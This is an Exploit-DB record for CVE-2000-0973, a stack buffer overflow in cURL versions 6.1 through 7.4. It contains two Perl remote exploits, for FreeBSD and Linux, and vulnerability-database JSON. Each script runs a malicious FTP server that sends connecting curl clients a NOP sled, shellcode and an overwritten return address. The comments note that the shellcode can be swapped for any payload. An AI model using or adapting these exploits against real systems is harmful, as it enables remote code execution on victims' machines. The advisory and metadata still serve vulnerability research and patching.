source: http://www.securityfocus.com/bid/1804/info
Curl is an open-source utility for sending or receiving files using URL syntax. A vulnerability exists in the version of curl included with Debian GNU/Linux 2.2 and FreeBSD (prior to 4.2 release).
Note that cURL runs on other platforms as well, and earlier versions may be also vulnerable.
Curl's error-logging feature improperly tests the size of generated error messages, which are sent from a remote host. A malicious remote server could send a maliciously-formed response to a request from curl, designed to exceed the maximum length of the error buffer. The contents of this oversized buffer, when copied onto the stack, can potentially overwrite the calling functions' return address. This can alter the program's flow of execution and result in arbitrary code being run on the client host.
#!/usr/bin/perl
#
# Remote FreeBSD cURL exploit for versions 6.1 - 7.4
#
# Written by zillion (at http://www.safemode.org && http://www.xsnosoft.com)
#
# This exploit may only be used for testing purposes. More information
# about the used vulnerability can be found on securityfocus:
#
# http://online.securityfocus.com/bid/1804
#
# The shellcode will write "Ha! Owned by a cURL!" to stdout on the system
# running cURL. The extra nops are needed because the buffer, which causes
# the overflow, is altered.
#
# $ ./curl -s ftp://xxx.xxx.xxx.xxx:21/
# Ha! Owned by a cURL!
use IO::Socket;
use Net::hostent;
########################################################################
$shellcode =
"\xeb\x14\x5e\x31\xc0\x6a\x14\x56\x40\x40\x50\xb0\x04\x50\xcd".
"\x80\x31\xc0\x40\x50\xcd\x80\xe8\xe7\xff\xff\xff\x48\x61\x21".
"\x20\x4f\x77\x6e\x65\x64\x20\x62\x79\x20\x61\x20\x63\x55\x52".
"\x4c\x21\x23".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
while($_ = $ARGV[0], /^-/) {
shift;
last if /^--$/;
/^-p/ && do { $port = shift; };
/^-l/ && do { $list = 1; };
/^-o/ && do { $offset = shift; };
}
$id = `id -u`; chop($id);
$size = 225;
$esp = 0xbfbffbd4;
$offset = -140 unless $offset;
$port = 21 unless $port;
if(!$list || $port > 1024 && $id != 0) {
print <<"TWENTE";
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+
Usage : $0 -l
Option: $0 -p <port to listen on>
Option: $0 -o <offset>
Note: low ports require root privileges
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+
TWENTE
exit;
}
for ($i = 0; $i < ($size - length($shellcode)) - 4; $i++) {
$buffer .= "\x90";
}
$buffer .= $shellcode;
$buffer .= pack('l', ($esp + $offset));
print("We are using return address: 0x", sprintf('%lx',($esp - $offset)), "\n");
print "Starting to listen for incomming connections on port $port\n";
my $sock = new IO::Socket::INET (
LocalPort => $port,
Proto => 'tcp',
Listen => 1,
Reuse => 1,
);
die "Could not create socket: $!\n" unless $sock;
while($cl = $sock->accept()) {
$hostinfo = gethostbyaddr($cl->peeraddr);
printf "[Received connect from %s]\n", $cl->peerhost;
print $cl "220 Safemode.org FTP server (Version 666) ready.\n";
print $cl "230 Ok\n";
print $cl "227 $buffer\n";
sleep 2;
}
{"id": "EDB-ID:20292", "hash": "d2c755abf27226df20a927b3c5f0b75e", "type": "exploitdb", "bulletinFamily": "exploit", "title": "cURL 6.1 - 7.4 - Remote Buffer Overflow Vulnerability 1", "description": "cURL 6.1 - 7.4 Remote Buffer Overflow Vulnerability (1). CVE-2000-0973. Remote exploit for freebsd platform", "published": "2000-10-13T00:00:00", "modified": "2000-10-13T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/20292/", "reporter": "zillion", "references": [], "cvelist": ["CVE-2000-0973"], "lastseen": "2016-02-02T13:55:18", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 10.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2000-0973"]}, {"type": "osvdb", "idList": ["OSVDB:1612"]}, {"type": "exploitdb", "idList": ["EDB-ID:20293"]}], "modified": "2016-02-02T13:55:18"}, "vulnersScore": 10.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/20292/", "sourceData": "source: http://www.securityfocus.com/bid/1804/info\r\n\r\nCurl is an open-source utility for sending or receiving files using URL syntax. A vulnerability exists in the version of curl included with Debian GNU/Linux 2.2 and FreeBSD (prior to 4.2 release). \r\n\r\nNote that cURL runs on other platforms as well, and earlier versions may be also vulnerable. \r\n\r\nCurl's error-logging feature improperly tests the size of generated error messages, which are sent from a remote host. A malicious remote server could send a maliciously-formed response to a request from curl, designed to exceed the maximum length of the error buffer. The contents of this oversized buffer, when copied onto the stack, can potentially overwrite the calling functions' return address. This can alter the program's flow of execution and result in arbitrary code being run on the client host.\r\n\r\n#!/usr/bin/perl\r\n#\r\n# Remote FreeBSD cURL exploit for versions 6.1 - 7.4\r\n#\r\n# Written by zillion (at http://www.safemode.org && http://www.xsnosoft.com)\r\n#\r\n# This exploit may only be used for testing purposes. More information \r\n# about the used vulnerability can be found on securityfocus:\r\n#\r\n# http://online.securityfocus.com/bid/1804\r\n#\r\n# The shellcode will write \"Ha! Owned by a cURL!\" to stdout on the system\r\n# running cURL. The extra nops are needed because the buffer, which causes\r\n# the overflow, is altered.\r\n#\r\n# $ ./curl -s ftp://xxx.xxx.xxx.xxx:21/\r\n# Ha! Owned by a cURL! \r\n\r\nuse IO::Socket;\r\nuse Net::hostent;\r\n\r\n########################################################################\r\n\r\n$shellcode = \r\n \"\\xeb\\x14\\x5e\\x31\\xc0\\x6a\\x14\\x56\\x40\\x40\\x50\\xb0\\x04\\x50\\xcd\".\r\n \"\\x80\\x31\\xc0\\x40\\x50\\xcd\\x80\\xe8\\xe7\\xff\\xff\\xff\\x48\\x61\\x21\".\r\n \"\\x20\\x4f\\x77\\x6e\\x65\\x64\\x20\\x62\\x79\\x20\\x61\\x20\\x63\\x55\\x52\".\r\n \"\\x4c\\x21\\x23\".\r\n\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\";\r\n\r\nwhile($_ = $ARGV[0], /^-/) {\r\n shift; \r\n last if /^--$/;\r\n /^-p/ && do { $port = shift; };\r\n /^-l/ && do { $list = 1; };\r\n /^-o/ && do { $offset = shift; };\r\n}\r\n\r\n\r\n$id = `id -u`; chop($id);\r\n$size = 225;\r\n$esp = 0xbfbffbd4;\r\n$offset = -140 unless $offset;\r\n$port = 21 unless $port;\r\n\r\nif(!$list || $port > 1024 && $id != 0) {\r\n\r\nprint <<\"TWENTE\";\r\n\r\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n\r\n Usage : $0 -l \r\n Option: $0 -p <port to listen on>\r\n Option: $0 -o <offset>\r\n\r\n Note: low ports require root privileges\r\n\r\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n\r\nTWENTE\r\nexit;\r\n\r\n}\r\n\r\nfor ($i = 0; $i < ($size - length($shellcode)) - 4; $i++) {\r\n $buffer .= \"\\x90\";\r\n}\r\n\r\n$buffer .= $shellcode;\r\n$buffer .= pack('l', ($esp + $offset)); \r\n\r\nprint(\"We are using return address: 0x\", sprintf('%lx',($esp - $offset)), \"\\n\");\r\nprint \"Starting to listen for incomming connections on port $port\\n\";\r\n\r\nmy $sock = new IO::Socket::INET (\r\n LocalPort => $port,\r\n Proto => 'tcp',\r\n Listen => 1,\r\n Reuse => 1,\r\n );\r\ndie \"Could not create socket: $!\\n\" unless $sock;\r\n\r\nwhile($cl = $sock->accept()) {\r\n\r\n $hostinfo = gethostbyaddr($cl->peeraddr);\r\n printf \"[Received connect from %s]\\n\", $cl->peerhost;\r\n print $cl \"220 Safemode.org FTP server (Version 666) ready.\\n\";\r\n print $cl \"230 Ok\\n\";\r\n print $cl \"227 $buffer\\n\";\r\n sleep 2;\r\n\r\n}", "osvdbidlist": ["1612"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2018-05-06T20:29:21", "bulletinFamily": "NVD", "description": "Buffer overflow in curl earlier than 6.0-1.1, and curl-ssl earlier than 6.0-1.2, allows remote attackers to execute arbitrary commands by forcing a long error message to be generated.", "modified": "2018-05-02T21:29:09", "published": "2000-12-19T00:00:00", "id": "CVE-2000-0973", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0973", "title": "CVE-2000-0973", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T13:55:26", "bulletinFamily": "exploit", "description": "cURL 6.1 - 7.4 Remote Buffer Overflow Vulnerability (2). CVE-2000-0973. Remote exploit for linux platform", "modified": "2000-10-13T00:00:00", "published": "2000-10-13T00:00:00", "id": "EDB-ID:20293", "href": "https://www.exploit-db.com/exploits/20293/", "type": "exploitdb", "title": "cURL 6.1 - 7.4 - Remote Buffer Overflow Vulnerability 2", "sourceData": "source: http://www.securityfocus.com/bid/1804/info\r\n \r\nCurl is an open-source utility for sending or receiving files using URL syntax. A vulnerability exists in the version of curl included with Debian GNU/Linux 2.2 and FreeBSD (prior to 4.2 release).\r\n \r\nNote that cURL runs on other platforms as well, and earlier versions may be also vulnerable.\r\n \r\nCurl's error-logging feature improperly tests the size of generated error messages, which are sent from a remote host. A malicious remote server could send a maliciously-formed response to a request from curl, designed to exceed the maximum length of the error buffer. The contents of this oversized buffer, when copied onto the stack, can potentially overwrite the calling functions' return address. This can alter the program's flow of execution and result in arbitrary code being run on the client host.\r\n\r\n#!/usr/bin/perl\r\n#\r\n# Remote linux cURL exploit for versions 6.1 - 7.4\r\n#\r\n# Written by zillion (at http://safemode.org && http://www.snosoft.com)\r\n# \r\n# This exploit, which has been tested to work with cURL 6.4, 7.2 and 7.3, \r\n# may only be used for testing purposes. Additionally, the author does not \r\n# take any resposibilities for abuse of this file. More information about \r\n# the used vulnerability can be found on securityfocus:\r\n#\r\n# http://online.securityfocus.com/bid/1804\r\n#\r\n# The shellcode will write \"Owned by a cURL ;)\" to the file /tmp/0wned.txt\r\n# You can replace it with whatever you want but be warned: due to buffer \r\n# manipilation working shellcode might be altered.\r\n#\r\n# A FreeBSD version is also available on safemode.org\r\n\r\nuse IO::Socket;\r\nuse Net::hostent;\r\n\r\n$shellcode = # does a open() write() close() and exit(). \r\n \"\\xeb\\x40\\x5e\\x31\\xc0\\x88\\x46\\x0e\\xc6\\x46\\x21\\x09\\xfe\\x46\\x21\".\r\n \"\\x88\\x46\\x22\\x8d\\x5e\\x0f\\x89\\x5e\\x23\\xb0\\x05\\x8d\\x1e\\x66\\xb9\".\r\n \"\\x42\\x04\\x66\\xba\\xe4\\x01\\xcd\\x80\\x89\\xc3\\xb0\\x04\\x8b\\x4e\\x23\".\r\n \"\\x66\\xba\\x0f\\x27\\x66\\x81\\xea\\xfc\\x26\\xcd\\x80\\xb0\\x06\\xcd\\x80\".\r\n \"\\xb0\\x01\\x31\\xdb\\xcd\\x80\\xe8\\xbb\\xff\\xff\\xff\\x2f\\x74\\x6d\\x70\".\r\n \"\\x2f\\x30\\x77\\x6e\\x65\\x64\\x2e\\x74\\x78\\x74\\x23\\x30\\x77\\x6e\\x65\".\r\n \"\\x64\\x20\\x62\\x79\\x20\\x61\\x20\\x63\\x55\\x52\\x4c\\x20\\x3b\\x29\";\r\n\r\nwhile($_ = $ARGV[0], /^-/) {\r\n shift; \r\n last if /^--$/;\r\n /^-p/ && do { $port = shift; };\r\n /^-l/ && do { $list = 1; };\r\n /^-o/ && do { $offset = shift; };\r\n}\r\n\r\n\r\n$id = `id -u`; chop($id);\r\n$size = 249;\r\n$esp = 0xbffff810;\r\n$offset = -150 unless $offset;\r\n$port = 21 unless $port;\r\n\r\nif(!$list || $port > 1024 && $id != 0) {\r\n\r\nprint <<\"TWENTE\";\r\n\r\n Usage : $0 -l \r\n Option: $0 -p <port to listen on>\r\n Option: $0 -o <offset>\r\n\r\n Note: low ports require root privileges\r\n\r\nTWENTE\r\nexit;\r\n\r\n}\r\n\r\nfor ($i = 0; $i < ($size - length($shellcode)) - 4; $i++) {\r\n $buffer .= \"\\x90\";\r\n}\r\n\r\n$buffer .= \"$shellcode\";\r\n$buffer .= pack('l', ($esp + $offset)); \r\n\r\nprint(\"Listening on port $port. We are using return address: 0x\", sprintf('%lx',($esp - $offset)), \"\\n\");\r\n\r\nmy $sock = new IO::Socket::INET (\r\n LocalPort => $port,\r\n Proto => 'tcp',\r\n Listen => 1,\r\n Reuse => 1,\r\n );\r\ndie \"Could not create socket: $!\\n\" unless $sock;\r\n\r\nwhile($cl = $sock->accept()) {\r\n\r\n $hostinfo = gethostbyaddr($cl->peeraddr);\r\n printf \"[Received connect from %s]\\n\", $hostinfo->name || $cl->peerhost;\r\n print $cl \"220 Safemode.org FTP server (Version 666) ready.\\n\";\r\n print $cl \"230 Ok\\n\";\r\n print $cl \"227 $buffer\\n\";\r\n sleep 2;\r\n\r\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20293/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:56", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nRedHat RHSA: RHSA-2000:092-01\nISS X-Force ID: 5374\n[CVE-2000-0973](https://vulners.com/cve/CVE-2000-0973)\nBugtraq ID: 1804\n", "modified": "2000-10-13T00:00:00", "published": "2000-10-13T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:1612", "id": "OSVDB:1612", "type": "osvdb", "title": "cURL / curl-ssl Error Message Remote Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
